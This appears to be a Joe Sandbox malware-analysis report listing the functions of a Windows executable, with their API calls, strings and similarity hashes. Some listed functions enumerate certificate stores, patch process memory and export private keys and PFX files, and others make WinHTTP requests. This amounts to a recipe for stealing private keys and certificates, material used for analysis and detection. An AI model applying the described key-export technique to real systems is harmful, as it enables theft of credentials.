Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CreateErrorLast$Pipe$CloseHandleProcess
String ID:
API String ID: 2620922840-0
Opcode ID: 7ed28186285976bbbed012161b1c53923df8aba68a63d871357f64017f65b850
Instruction ID: f28b34449969a272c2e1d1ec05ac892e37f0da6fba7c7402041831ce4b7ba7b3
Opcode Fuzzy Hash: 7ed28186285976bbbed012161b1c53923df8aba68a63d871357f64017f65b850
Instruction Fuzzy Hash: 87517376B08A41C6E790EF71D584BEC63A5AB58788F84003AEE0DABB59DF3CD109D350

Function 00007FF763AF9224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158
synchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF924D

Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF93AB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF93C0
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF93EF

Part of subcall function 00007FF763AF968C: PeekNamedPipe.KERNEL32 ref: 00007FF763AF96B8

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF9421
GetExitCodeProcess.KERNEL32 ref: 00007FF763AF9460

Strings

& echo , xrefs: 00007FF763AF92BF

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
String ID: & echo
API String ID: 2711250446-3491486023
Opcode ID: 016a01f73afbadfa819e5497bcf1e030ae99ddaa61e3bafcda52874dbe721003
Instruction ID: ee36ea4eb2465f04854e5e4680fb7b6b3a103a0e5680e1ef86143d2af7bce444
Opcode Fuzzy Hash: 016a01f73afbadfa819e5497bcf1e030ae99ddaa61e3bafcda52874dbe721003
Instruction Fuzzy Hash: F9515125B09642C1EEA4FF12E554ABAE351FF84B84F88413EEA4E67785DE3CE445D320

Function 00007FF763AF9478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
timesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF763AF94BF
WaitForSingleObject.KERNEL32 ref: 00007FF763AF9505
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF763AF9517
TerminateProcess.KERNEL32 ref: 00007FF763AF953A

Part of subcall function 00007FF763AF968C: PeekNamedPipe.KERNEL32 ref: 00007FF763AF96B8

GetExitCodeProcess.KERNEL32 ref: 00007FF763AF9585
CloseHandle.KERNEL32 ref: 00007FF763AF9593

Strings

exit, xrefs: 00007FF763AF9482

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
String ID: exit
API String ID: 1626563136-1626635026
Opcode ID: e9e34274aeea68a913adea50c2b43826d043e5256863e9948eb928a6b09cc203
Instruction ID: a47c0bbd9797111546a3e7b6e6e3bf04e8e46aa1223e42bf84363952bb1fe5ec
Opcode Fuzzy Hash: e9e34274aeea68a913adea50c2b43826d043e5256863e9948eb928a6b09cc203
Instruction Fuzzy Hash: 1D31A025A08502C1EBD4FF24D550A7DA361EF88B88FCC103AFA4E96399DF2CD849D720

Function 00007FF763AF2BAC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenStore.CRYPT32 ref: 00007FF763AF2C16
CertCloseStore.CRYPT32 ref: 00007FF763AF2CC2

Part of subcall function 00007FF763AF2D5C: CertEnumCertificatesInStore.CRYPT32 ref: 00007FF763AF2D90
Part of subcall function 00007FF763AF2D5C: CertGetNameStringW.CRYPT32 ref: 00007FF763AF2DD3
Part of subcall function 00007FF763AF2D5C: CertNameToStrW.CRYPT32 ref: 00007FF763AF2EB8
Part of subcall function 00007FF763AF2D5C: CertNameToStrW.CRYPT32 ref: 00007FF763AF2F0A

Strings

gszs, xrefs: 00007FF763AF2C6B
zszs, xrefs: 00007FF763AF2C5E
*sms, xrefs: 00007FF763AF2C88

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Cert$NameStore$CertificatesCloseEnumOpenString
String ID: *sms$gszs$zszs
API String ID: 3617724111-4219868587
Opcode ID: a3fe3b844ec616656594b77919c06264c151e8813e30518a5e839789af4a8af6
Instruction ID: eea1af6c7bd9f6554b3105daf3e45681351d11b3e848b4725f9adad9c73a4b3b
Opcode Fuzzy Hash: a3fe3b844ec616656594b77919c06264c151e8813e30518a5e839789af4a8af6
Instruction Fuzzy Hash: 5721A976A186C1C1E790EF16E4506AAE361FB84B80F889036FE8E5B759DF3CD405C750

Function 00007FF763AFCC08 Relevance: 6.1, APIs: 4, Instructions: 61
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 00007FF763AFCC4D
RegEnumKeyExW.ADVAPI32 ref: 00007FF763AFCC87
RegEnumKeyExW.ADVAPI32 ref: 00007FF763AFCCD6
RegCloseKey.ADVAPI32 ref: 00007FF763AFCCE5

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Enum$CloseOpen
String ID:
API String ID: 1701607978-0
Opcode ID: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
Instruction ID: 70d28d5ca4c6e9369d7d1b3b1b606c8bbfe1ccafb8c27f51a30fcc807a15f400
Opcode Fuzzy Hash: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
Instruction Fuzzy Hash: FB215832618B8582D3108F12E484B6AB7B8F788B84F594226EA8C57B18DF3DD559CB00

Function 00007FF763AF2B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStore.CRYPT32 ref: 00007FF763AF2B7F

Strings

":{, xrefs: 00007FF763AF2B4D
"_":"", xrefs: 00007FF763AF2B5C

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CertEnumStoreSystem
String ID: ":{$"_":""
API String ID: 4132996702-2026347918
Opcode ID: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
Instruction ID: 7fde9ebdfdf3720b3675412003d307e75fb534ecaa10602f2cda655d57a28751
Opcode Fuzzy Hash: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
Instruction Fuzzy Hash: 89016255E08642C1FA88FB56A4408B9D355AF88BC4FCC9036FD9E6B75A9F3CD142C750

Function 00007FF763AF7138 Relevance: 4.5, APIs: 3, Instructions: 38
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF763AF7503), ref: 00007FF763AF714F
CoInitializeSecurity.COMBASE ref: 00007FF763AF71B6
CoCreateInstance.COMBASE ref: 00007FF763AF71D3

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Initialize$CreateInstanceSecurity
String ID:
API String ID: 89549506-0
Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction ID: 1048554f46eb8fd0d7974ca55acc73ed50e0dcc7fb5aa4c9a7d6a310853dcfe4
Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction Fuzzy Hash: D2118C73A14640DAF3109F71E8597AE7774F34870DF548218EA492AA58CF3CD245CB94

Function 00007FF763AF31C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22encryptionCOMMON

Download Yara Rule

APIs

CertEnumSystemStoreLocation.CRYPT32 ref: 00007FF763AF3200

Strings

"_": "", xrefs: 00007FF763AF31E2

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CertEnumLocationStoreSystem
String ID: "_": ""
API String ID: 863500693-1453221996
Opcode ID: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
Instruction ID: 67f090edbc8ebfa8a83711c077bdc5efc2cb4ed9469e20e186a7a82e7de3661c
Opcode Fuzzy Hash: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
Instruction Fuzzy Hash: 79E06D89B18543C0EEC8BB62A8518F493149F487C0FCC6037F85F2A356EE2CD089C360

Function 00007FF763AFCD0C Relevance: 3.0, APIs: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegGetValueW.KERNELBASE ref: 00007FF763AFCD4B

Part of subcall function 00007FF763AF2588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF763AFCD61), ref: 00007FF763AF2595

RegGetValueW.ADVAPI32 ref: 00007FF763AFCD8A

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Value$HeapProcess
String ID:
API String ID: 3133723474-0
Opcode ID: a28c24243887c53b92bd3dd9b02b70499d59a5de783e5fc6fd81f97936264431
Instruction ID: 45452b6573a4df171a066902fd642445eed8bf895b2db116328d5f3cf8bb4d12
Opcode Fuzzy Hash: a28c24243887c53b92bd3dd9b02b70499d59a5de783e5fc6fd81f97936264431
Instruction Fuzzy Hash: 0F117C36718B81C6D750DF12E48489EB3A9FB88B80B994139EF9C57B14DF39D915CB10

Function 00007FF763AF968C Relevance: 3.0, APIs: 2, Instructions: 42filepipeCOMMON

Download Yara Rule

APIs

PeekNamedPipe.KERNEL32 ref: 00007FF763AF96B8
ReadFile.KERNEL32 ref: 00007FF763AF96F7

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: FileNamedPeekPipeRead
String ID:
API String ID: 327342812-0
Opcode ID: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
Instruction ID: e7e9611f8977c7ca78dfeaa69a902d7cda97458b390f4681e75209c74e083765
Opcode Fuzzy Hash: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
Instruction Fuzzy Hash: C0018032B18682C3E790AF56E504B7AE3A1EB85BD4F584139EA4C4B754DF7CD444CB50

Function 00007FF763AF95A0 Relevance: 3.0, APIs: 2, Instructions: 39synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,00007344,00007FF763AF9B7C), ref: 00007FF763AF95B6
GetExitCodeProcess.KERNEL32 ref: 00007FF763AF95F6

Part of subcall function 00007FF763AF968C: PeekNamedPipe.KERNEL32 ref: 00007FF763AF96B8

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
String ID:
API String ID: 2021502500-0
Opcode ID: 71321f3c5b00947e8a7b57791e3d2b441492a2231b789ead44b8743cebe12814
Instruction ID: 522cfbff681e7d04d8dbbfdf13edbe8bfd7f5d7858e449c751be7acd1b5f874b
Opcode Fuzzy Hash: 71321f3c5b00947e8a7b57791e3d2b441492a2231b789ead44b8743cebe12814
Instruction Fuzzy Hash: C4018022A08642C2EFD4AF21D540B78A361EF44F88F9C503EEA0D5A689DF2CDC85D320

Function 00007FF763AF25B4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
Instruction ID: 2333f8993602ce0ab327fe18c1c60c2652614a601fbe156bbcbd0c55a2a9d853
Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
Instruction Fuzzy Hash: 73C01248F0A642C2FE9CA7E3645447183516F5DF85B8C4034DD4E297519E2C51D58210

Function 00007FF763AF1A70 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

wvsprintfW.USER32 ref: 00007FF763AF1AA9

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: wvsprintf
String ID:
API String ID: 2795597889-0
Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction ID: 2a9aefea84ba6b81df4c6d25ba56f61d4ea1f03e6780361e6c69373ce2134da7
Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction Fuzzy Hash: 9FE06DB2A00B45C2D704DF25E98048CBBB5EB99FC8B948025DB4C2B324CF38D996C7A0

Function 00007FF763AF79C4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF763AF74DE), ref: 00007FF763AF79CD

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction ID: 597f5c374cd6ada0ef1626ff5f877ed059db9b693acff27a2c34270838c88318
Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction Fuzzy Hash: 1CD05E02C08482C2DAF27B00D446436E361BB58308FC80236E18D126A06F6ED689EA35

Non-executed Functions

Function 00007FF763AF3220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF325E
CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF763AF328D
CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF32BB

Part of subcall function 00007FF763AF36F0: CryptExportKey.ADVAPI32 ref: 00007FF763AF3744
Part of subcall function 00007FF763AF36F0: CryptExportKey.ADVAPI32 ref: 00007FF763AF379E

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3336
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3380
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF33AC
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF33DC
CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF3404
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF341C
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF343F
CryptAcquireContextA.ADVAPI32 ref: 00007FF763AF3459
CryptImportKey.ADVAPI32 ref: 00007FF763AF347E
OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF34B5
OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3505
QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3523
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3532
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF355D
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF357C
WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF359F
NCryptExportKey.NCRYPT ref: 00007FF763AF3605
CertOpenStore.CRYPT32 ref: 00007FF763AF3667
CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF763AF3682
CertSetCertificateContextProperty.CRYPT32 ref: 00007FF763AF369E
PFXExportCertStoreEx.CRYPT32 ref: 00007FF763AF36BD
PFXExportCertStoreEx.CRYPT32 ref: 00007FF763AF36DF

Strings

Microsoft Software Key Storage Provider, xrefs: 00007FF763AF360D
jlzm, xrefs: 00007FF763AF32F2
4(G, xrefs: 00007FF763AF34C7
,-1{, xrefs: 00007FF763AF32FB
CAPIPRIVATEBLOB, xrefs: 00007FF763AF35AF, 00007FF763AF35DE, 00007FF763AF3622

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
String ID: ,-1{$4(G$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$jlzm
API String ID: 2161712720-3700434115
Opcode ID: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
Instruction ID: cc5996c5efcd0cb9c9d1ae2e95393c346ab09846855e98ae31ac4baa84d5701c
Opcode Fuzzy Hash: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
Instruction Fuzzy Hash: 1EE14D36B14A418AE754DF61E844AEDB3A1FB48788F84413AEE8D2BB58DF3CD109C750

Function 00007FF763AF213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

WinHttpOpen.WINHTTP ref: 00007FF763AF218D

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

WinHttpCrackUrl.WINHTTP ref: 00007FF763AF21D8
WinHttpConnect.WINHTTP ref: 00007FF763AF2213
WinHttpOpenRequest.WINHTTP ref: 00007FF763AF22A8
WinHttpQueryOption.WINHTTP ref: 00007FF763AF22E0
WinHttpSetOption.WINHTTP ref: 00007FF763AF22FC
WinHttpSendRequest.WINHTTP ref: 00007FF763AF231D
WinHttpReceiveResponse.WINHTTP ref: 00007FF763AF2330
WinHttpQueryDataAvailable.WINHTTP ref: 00007FF763AF2359
WinHttpReadData.WINHTTP ref: 00007FF763AF2381
WinHttpCloseHandle.WINHTTP ref: 00007FF763AF24C7
WinHttpCloseHandle.WINHTTP ref: 00007FF763AF24D0
WinHttpCloseHandle.WINHTTP ref: 00007FF763AF24E0

Strings

=r:r, xrefs: 00007FF763AF2241
>r!r, xrefs: 00007FF763AF2265
>r!r, xrefs: 00007FF763AF2440

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
